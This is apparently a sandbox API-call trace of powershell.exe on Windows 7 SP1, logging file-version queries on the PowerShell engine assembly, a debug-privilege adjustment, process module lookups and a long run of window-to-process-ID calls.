	[0125.129] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0125.130] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0125.130] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0125.130] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0125.893] AtlComPtrAssign () 
	[0126.286] GetVersionExW (in: lpVersionInformation=0x25d980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x25d980*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0126.287] GetVersionExW (in: lpVersionInformation=0x25d980*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x25d980*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0126.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0126.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0126.487] GetVersionExW (in: lpVersionInformation=0x25d6f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x25d6f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0126.487] SetErrorMode (uMode=0x1) returned 0x1
	[0126.500] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x25d850 | out: lpFileInformation=0x25d850*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0126.501] SetErrorMode (uMode=0x1) returned 0x1
	[0126.505] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x25dac0 | out: lpdwHandle=0x25dac0) returned 0x94c
	[0126.506] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d27370 | out: lpData=0x2d27370) returned 1
	[0126.508] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25da38, puLen=0x25da30 | out: lplpBuffer=0x25da38*=0x2d2740c, puLen=0x25da30) returned 1
	[0126.510] lstrlenW (lpString="䅁") returned 1
	[0126.554] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x25d9a8, puLen=0x25d9a0 | out: lplpBuffer=0x25d9a8*=0x2d274e8, puLen=0x25d9a0) returned 1
	[0126.555] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0126.557] CoTaskMemAlloc (cb=0x2e) returned 0x4aa260
	[0126.557] lstrcpyW (in: lpString1=0x4aa260, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0126.558] CoTaskMemFree (pv=0x4aa260) 
	[0126.558] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x25d9a8, puLen=0x25d9a0 | out: lplpBuffer=0x25d9a8*=0x2d2753c, puLen=0x25d9a0) returned 1
	[0126.558] lstrlenW (lpString="System.Management.Automation") returned 28
	[0126.558] CoTaskMemAlloc (cb=0x3c) returned 0x447590
	[0126.558] lstrcpyW (in: lpString1=0x447590, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0126.558] CoTaskMemFree (pv=0x447590) 
	[0126.558] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x25d9a8, puLen=0x25d9a0 | out: lplpBuffer=0x25d9a8*=0x2d27598, puLen=0x25d9a0) returned 1
	[0126.558] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0126.558] CoTaskMemAlloc (cb=0x20) returned 0x4a8380
	[0126.558] lstrcpyW (in: lpString1=0x4a8380, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0126.558] CoTaskMemFree (pv=0x4a8380) 
	[0126.558] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x25d9a8, puLen=0x25d9a0 | out: lplpBuffer=0x25d9a8*=0x2d275d8, puLen=0x25d9a0) returned 1
	[0126.558] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0126.558] CoTaskMemAlloc (cb=0x44) returned 0x447590
	[0126.558] lstrcpyW (in: lpString1=0x447590, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0126.558] CoTaskMemFree (pv=0x447590) 
	[0126.558] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x25d9a8, puLen=0x25d9a0 | out: lplpBuffer=0x25d9a8*=0x2d27640, puLen=0x25d9a0) returned 1
	[0126.558] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0126.558] CoTaskMemAlloc (cb=0x76) returned 0x437ed0
	[0126.558] lstrcpyW (in: lpString1=0x437ed0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0126.558] CoTaskMemFree (pv=0x437ed0) 
	[0126.558] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x25d9a8, puLen=0x25d9a0 | out: lplpBuffer=0x25d9a8*=0x2d276dc, puLen=0x25d9a0) returned 1
	[0126.558] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0126.558] CoTaskMemAlloc (cb=0x44) returned 0x447590
	[0126.558] lstrcpyW (in: lpString1=0x447590, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0126.558] CoTaskMemFree (pv=0x447590) 
	[0126.558] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x25d9a8, puLen=0x25d9a0 | out: lplpBuffer=0x25d9a8*=0x2d27740, puLen=0x25d9a0) returned 1
	[0126.558] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0126.558] CoTaskMemAlloc (cb=0x58) returned 0x400db0
	[0126.558] lstrcpyW (in: lpString1=0x400db0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0126.558] CoTaskMemFree (pv=0x400db0) 
	[0126.559] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x25d9a8, puLen=0x25d9a0 | out: lplpBuffer=0x25d9a8*=0x2d277bc, puLen=0x25d9a0) returned 1
	[0126.559] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0126.559] CoTaskMemAlloc (cb=0x20) returned 0x4a8380
	[0126.559] lstrcpyW (in: lpString1=0x4a8380, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0126.559] CoTaskMemFree (pv=0x4a8380) 
	[0126.559] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x25d9a8, puLen=0x25d9a0 | out: lplpBuffer=0x25d9a8*=0x2d27464, puLen=0x25d9a0) returned 1
	[0126.559] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0126.559] CoTaskMemAlloc (cb=0x66) returned 0x4ae1f0
	[0126.559] lstrcpyW (in: lpString1=0x4ae1f0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0126.559] CoTaskMemFree (pv=0x4ae1f0) 
	[0126.559] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x25d9a8, puLen=0x25d9a0 | out: lplpBuffer=0x25d9a8*=0x0, puLen=0x25d9a0) returned 0
	[0126.559] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x25d9a8, puLen=0x25d9a0 | out: lplpBuffer=0x25d9a8*=0x0, puLen=0x25d9a0) returned 0
	[0126.559] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x25d9a8, puLen=0x25d9a0 | out: lplpBuffer=0x25d9a8*=0x0, puLen=0x25d9a0) returned 0
	[0126.559] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25d978, puLen=0x25d970 | out: lplpBuffer=0x25d978*=0x2d2740c, puLen=0x25d970) returned 1
	[0126.560] CoTaskMemAlloc (cb=0x204) returned 0x432fb0
	[0126.560] VerLanguageNameW (in: wLang=0x0, szLang=0x432fb0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0126.561] CoTaskMemFree (pv=0x432fb0) 
	[0126.561] VerQueryValueW (in: pBlock=0x2d27370, lpSubBlock="\\", lplpBuffer=0x25d9c8, puLen=0x25d9c0 | out: lplpBuffer=0x25d9c8*=0x2d27398, puLen=0x25d9c0) returned 1
	[0126.751] GetCurrentProcessId () returned 0xc5c
	[0126.758] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x25c8f0 | out: lpLuid=0x25c8f0*(LowPart=0x14, HighPart=0)) returned 1
	[0126.761] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x25c910 | out: TokenHandle=0x25c910*=0x2f0) returned 1
	[0126.762] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2d2abe8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0126.772] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2d2ac50, cb=0x200, lpcbNeeded=0x25d928 | out: lphModule=0x2d2ac50, lpcbNeeded=0x25d928) returned 1
	[0126.774] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13ff20000, lpmodinfo=0x2d2aec0, cb=0x18 | out: lpmodinfo=0x2d2aec0*(lpBaseOfDll=0x13ff20000, SizeOfImage=0x77000, EntryPoint=0x13ff2c63c)) returned 1
	[0126.775] CoTaskMemAlloc (cb=0x804) returned 0x4b2170
	[0126.775] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13ff20000, lpBaseName=0x4b2170, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0126.775] CoTaskMemFree (pv=0x4b2170) 
	[0126.775] CoTaskMemAlloc (cb=0x804) returned 0x4b2170
	[0126.775] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13ff20000, lpFilename=0x4b2170, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0126.776] CoTaskMemFree (pv=0x4b2170) 
	[0126.776] CloseHandle (hObject=0x2f0) returned 1
	[0126.927] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xc5c) returned 0x2f0
	[0126.928] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x25da58 | out: lpExitCode=0x25da58*=0x103) returned 1
	[0126.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d2b088, Length=0x20000, ResultLength=0x25da20 | out: SystemInformation=0x12d2b088, ResultLength=0x25da20*=0x13688) returned 0x0
	[0126.943] EnumWindows (lpEnumFunc=0x29766ac, lParam=0x0) returned 1
	[0126.944] GetWindowThreadProcessId (in: hWnd=0x50212, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.944] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.944] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.944] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x334
	[0126.944] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x324
	[0126.944] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.944] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.944] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.945] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.945] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.945] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.945] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.945] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.945] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.945] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x45c
	[0126.945] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.945] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.945] GetWindowThreadProcessId (in: hWnd=0x202a8, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0xa38
	[0126.945] GetWindowThreadProcessId (in: hWnd=0x30290, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0xc70
	[0126.945] GetWindowThreadProcessId (in: hWnd=0x10282, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x7dc
	[0126.946] GetWindowThreadProcessId (in: hWnd=0xb0184, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0xc08
	[0126.946] GetWindowThreadProcessId (in: hWnd=0x40240, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x728
	[0126.946] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x914
	[0126.946] GetWindowThreadProcessId (in: hWnd=0xa022e, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x9ec
	[0126.946] GetWindowThreadProcessId (in: hWnd=0x1401b2, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x610
	[0126.946] GetWindowThreadProcessId (in: hWnd=0x60192, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0xb5c
	[0126.946] GetWindowThreadProcessId (in: hWnd=0x60230, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0xbdc
	[0126.946] GetWindowThreadProcessId (in: hWnd=0x30234, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x8f0
	[0126.946] GetWindowThreadProcessId (in: hWnd=0x800aa, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0xb8c
	[0126.946] GetWindowThreadProcessId (in: hWnd=0x50228, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x5e0
	[0126.946] GetWindowThreadProcessId (in: hWnd=0x5021c, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x90
	[0126.946] GetWindowThreadProcessId (in: hWnd=0xa00a4, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.947] GetWindowThreadProcessId (in: hWnd=0x400d6, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.947] GetWindowThreadProcessId (in: hWnd=0x400fa, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.947] GetWindowThreadProcessId (in: hWnd=0x500d2, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.947] GetWindowThreadProcessId (in: hWnd=0x400bc, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.947] GetWindowThreadProcessId (in: hWnd=0x400c8, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.947] GetWindowThreadProcessId (in: hWnd=0x500d8, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.947] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.947] GetWindowThreadProcessId (in: hWnd=0x4021a, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x840
	[0126.947] GetWindowThreadProcessId (in: hWnd=0x3021e, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x844
	[0126.947] GetWindowThreadProcessId (in: hWnd=0x401f6, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x46c
	[0126.947] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0xb40
	[0126.947] GetWindowThreadProcessId (in: hWnd=0x40116, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x914
	[0126.948] GetWindowThreadProcessId (in: hWnd=0x700d4, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x988
	[0126.948] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x914
	[0126.948] GetWindowThreadProcessId (in: hWnd=0x201b8, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x950
	[0126.948] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x914
	[0126.948] GetWindowThreadProcessId (in: hWnd=0x201a8, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x914
	[0126.948] GetWindowThreadProcessId (in: hWnd=0x201aa, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x868
	[0126.948] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x850
	[0126.948] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x830
	[0126.948] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x814
	[0126.948] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x744
	[0126.948] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x2a8
	[0126.948] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x534
	[0126.949] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x5e4
	[0126.949] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x5c4
	[0126.949] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x58c
	[0126.949] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x238
	[0126.949] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x584
	[0126.949] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x7e8
	[0126.949] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x678
	[0126.949] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x35c
	[0126.949] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x51c
	[0126.949] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x360
	[0126.949] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x274
	[0126.949] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x588
	[0126.950] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0xc8
	[0126.950] GetWindowThreadProcessId (in: hWnd=0xa010a, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x21c
	[0126.950] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x5ec
	[0126.950] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x334
	[0126.950] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x664
	[0126.950] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x334
	[0126.950] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x664
	[0126.950] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x334
	[0126.950] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x5ec
	[0126.950] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x5ec
	[0126.950] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x550
	[0126.950] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x7a0
	[0126.951] GetWindowThreadProcessId (in: hWnd=0x6009c, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x594
	[0126.951] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x564
	[0126.951] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x45c
	[0126.951] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x548
	[0126.951] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.951] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x518
	[0126.951] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.951] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.951] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.951] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x508
	[0126.951] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.951] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4ec
	[0126.952] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.952] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x45c
	[0126.952] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x45c
	[0126.952] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x44c
	[0126.952] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x7ec
	[0126.952] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x45c
	[0126.952] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x324
	[0126.952] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.952] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0x4a0
	[0126.952] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x25d780 | out: lpdwProcessId=0x25d780) returned 0xcd0
